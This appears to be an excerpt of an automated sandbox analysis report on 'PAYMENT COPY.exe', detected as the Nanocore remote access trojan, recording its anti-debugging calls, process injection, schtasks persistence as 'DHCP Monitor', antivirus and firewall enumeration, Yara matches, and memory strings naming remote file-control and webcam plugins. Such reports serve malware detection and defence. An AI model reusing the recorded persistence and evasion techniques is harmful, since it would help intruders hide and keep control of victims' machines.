    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0040446F
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00401C88
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00401F30
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_00401E1D SetUnhandledExceptionFilter,15_2_00401E1D
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0040446F
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00401C88
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00401F30
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Maps a DLL or memory area into another processShow sources
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: unknown target: C:\Users\user\Desktop\PAYMENT COPY.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: unknown target: C:\Users\user\Desktop\PAYMENT COPY.exe protection: execute and read and writeJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: unknown target: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe' Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpEEDF.tmp'Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpF23B.tmp'Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe' 0Jump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' Jump to behavior
    Source: PAYMENT COPY.exe, 00000001.00000002.501042599.0000000000D80000.00000002.00000001.sdmp, dhcpmon.exe, 0000000A.00000002.498613399.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
    Source: PAYMENT COPY.exe, 00000001.00000002.503675448.00000000026D0000.00000004.00000001.sdmpBinary or memory string: Program Manager
    Source: PAYMENT COPY.exe, 00000001.00000002.501042599.0000000000D80000.00000002.00000001.sdmp, dhcpmon.exe, 0000000A.00000002.498613399.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: PAYMENT COPY.exe, 00000001.00000002.501042599.0000000000D80000.00000002.00000001.sdmp, dhcpmon.exe, 0000000A.00000002.498613399.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmpBinary or memory string: Program ManagerD$
    Source: PAYMENT COPY.exe, 00000001.00000002.503675448.00000000026D0000.00000004.00000001.sdmpBinary or memory string: Program Managerp
    Source: PAYMENT COPY.exe, 00000001.00000002.501042599.0000000000D80000.00000002.00000001.sdmp, dhcpmon.exe, 0000000A.00000002.498613399.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: PAYMENT COPY.exe, 00000001.00000002.505472590.000000000297E000.00000004.00000001.sdmpBinary or memory string: Program Manager@
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0040208D cpuid 1_2_0040208D
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00401B74
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403486
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

    Stealing of Sensitive Information:

    barindex
    Yara detected Nanocore RATShow sources
    Source: Yara matchFile source: 00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.505736368.000000000341C000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298228465.000000000054A000.00000004.00000020.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298702640.00000000032CC000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278034704.00000000007CE000.00000004.00000020.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278506705.000000000344C000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278355916.0000000002411000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278466609.0000000003411000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298677896.0000000003291000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.501309782.0000000002391000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.279255629.00000000049C2000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.279026119.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.299582604.00000000047B0000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.300040048.0000000004E32000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000001.257730823.0000000000400000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000001.281117600.0000000000414000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298587099.0000000002291000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6712, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6432, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 2896, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6612, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6392, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5932, type: MEMORY
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.47b0000.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.3430821.25.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.565f58.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.4e30000.10.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.565f58.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.342c1f8.24.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a80000.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.5b2488.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.5b2488.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a50000.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.342c1f8.24.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a61458.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a91458.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.3295530.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.3497815.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.34931ec.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.34931ec.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.348e3b6.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a61458.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a80000.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.47b0000.9.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.1.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.3317815.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a71458.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.7eae40.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.33131ec.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a91458.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.330e3b6.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.48f0000.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.33131ec.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.3415530.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.7eae40.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.3295530.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.48f0000.9.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a50000.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.1.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a60000.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a71458.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.3415530.5.unpack, type: UNPACKEDPE

    Remote Access Functionality:

    barindex
    Detected Nanocore RatShow sources
    Source: PAYMENT COPY.exe, 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: PAYMENT COPY.exeString found in binary or memory: NanoCore.ClientPluginHost
    Source: PAYMENT COPY.exe, 00000001.00000002.499927530.00000000006C0000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
    Source: PAYMENT COPY.exe, 00000001.00000002.500087557.00000000006E0000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
    Source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOp